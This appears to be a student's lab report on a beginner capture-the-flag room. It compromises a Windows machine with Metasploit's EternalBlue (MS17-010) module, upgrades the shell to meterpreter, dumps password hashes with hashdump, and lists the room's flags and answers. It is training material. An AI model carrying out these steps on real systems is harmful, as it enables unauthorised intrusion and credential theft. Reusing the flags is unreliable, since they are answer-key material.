System H Acking
System H Acking
System Hacking
1.Tasks:
Hack the Blue machine using Metasploit framework and submit a detailed
report here.
Blue
Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
>>Scan and learn what exploit this machine is vulnerable to. Please note that this machine does
not respond to ping (ICMP) and may take a few minutes to boot up. This room is not meant to
be a boot2root CTF, rather, this is an educational series for complete beginners. Professionals
will likely get very little out of this room beyond basic practice as the process here is meant to
be beginner-focused.
>> How many ports are open with a port number under 1000?
>>after scan the nmap it will show the port number in that we need to how many ports are
below 1000
>>in our report after scanning the nmap we get 3 port which is under 1000
>>enter msfconsole
>>search ms17-010
>>Find the exploitation code we will run against the machine. What is the full path of the code?
>>exploit/windows/smb/ms17_010_eternlblue
>>enter use 0
>>An exploit executes a sequence of commands that target a specific vulnerability found in a
system or application to provide the attacker with access to the system. >>enter exploit
>>search shell_to_meterpreter
>>enter shell
>>after process and channel created enter cntrl+z ->y
>>process list
>>To do migrate enter migrate command
enter hashdump to get the encrypted data to crack the password
>>we have used hashes website to get password from encrypted data >>enter
submit
>>
Show options and set the one required value. What is the name of this value? >>one
>>If you haven't already, background the previously gained shell (CTRL + Z). Research online how
to convert a shell to meterpreter shell in metasploit. What is the name of the post module we
will use?
>>post/multi/manage/shell_to_meterpreter
>>
>>Select this (use MODULE_PATH). Show options, what option are we required to change?
>>SESSION
Set the required option, you may need to list all of the sessions to find your target here.
>>Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the
one you just wrote down in the previous step. This may take several attempts, migrating
processes is not very stable. If this fails, you may need to re-run the conversion process or
reboot the machine and start once again. If this happens, try a different process next time.
>>
>>Cracking
>>Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of
the passwords on the machine as long as we have the correct privileges to do so. What is the
name of the non-default user?
>>Jon
>>cnrl+z->y
>>The pwd command writes to standard output the full path name of your current directory
(from the root directory)
>>enter cd ..
>>Displays directory of files and directories stored on disk. In addition to files and directories,
DIR also displays both the volume name and amount of free storage space on the disk (if there
are files stored in the current directory).
>>enter dir
>>after enter the dir command it will show to list of names
>>enter shell
>>enter dir *flag* /s /b command
>>flag{access_the_machine}
>>Flag2? This flag can be found at the location where passwords are stored within Windows.
>>flag{sam_database_elevated_access}
>>flag3? This flag can be found in an excellent location to loot. After all, Administrators usually
have pretty interesting things saved.
>>flag{admin_documents_can_be_valuable}
>>room is completed